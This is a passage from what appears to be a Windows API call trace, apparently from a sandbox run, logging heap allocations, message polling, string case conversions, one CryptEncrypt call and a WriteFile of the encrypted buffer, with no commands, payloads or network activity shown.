| out: lpMsg=0x8bf3c0) returned 0 [0189.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0189.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0189.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0189.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0189.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0189.127] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0189.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0189.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0189.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0189.127] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.128] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0189.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0189.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0189.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0189.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0189.128] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.128] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.128] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0189.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0189.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0189.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0189.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0189.128] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0189.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0189.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0189.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0189.129] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34d8a90*, pdwDataLen=0x8bef68*=0x13415, dwBufLen=0x13418 | out: pbData=0x34d8a90*, pdwDataLen=0x8bef68*=0x13418) returned 1 [0189.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0189.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0189.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0189.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0189.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0189.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0189.130] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0189.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0189.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0189.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0189.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0189.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0189.131] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.131] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0189.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0189.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0189.131] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0189.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0189.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0189.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0189.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0189.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0189.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0189.131] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.132] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0189.132] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0189.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0189.132] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0189.132] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0189.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0189.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0189.132] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0189.132] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.132] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0189.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0189.132] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0189.133] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0189.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0189.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0189.133] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0189.133] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.133] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0189.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0189.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0189.133] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.133] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0189.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0189.133] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0189.134] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0189.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0189.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0189.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0189.134] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0189.134] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.134] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0189.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0189.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0189.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0189.134] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.134] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.134] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0189.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0189.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0189.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.139] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 1 [0189.139] TranslateMessage (lpMsg=0x8bf710) returned 0 [0189.139] DispatchMessageW (lpMsg=0x8bf710) returned 0x0 [0189.139] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0189.139] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0189.139] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0189.139] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0189.139] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0189.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0189.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x13418) returned 0x34b2250 [0189.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.140] WriteFile (in: hFile=0x294, lpBuffer=0x34b2250*, nNumberOfBytesToWrite=0x13418, lpNumberOfBytesWritten=0x8bf5ec, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesWritten=0x8bf5ec*=0x13418, lpOverlapped=0x0) returned 1 [0189.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0189.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0189.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0189.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0189.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.142] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0189.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0189.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0189.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0189.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0189.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0189.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0189.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.143] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0189.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0189.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0189.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0189.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0189.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0189.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0189.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0189.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0189.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0189.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0189.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0189.144] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0189.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0189.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0189.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2db8 [0189.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0189.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0189.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0189.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0189.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0189.145] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0189.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0189.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0189.145] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0189.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0189.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 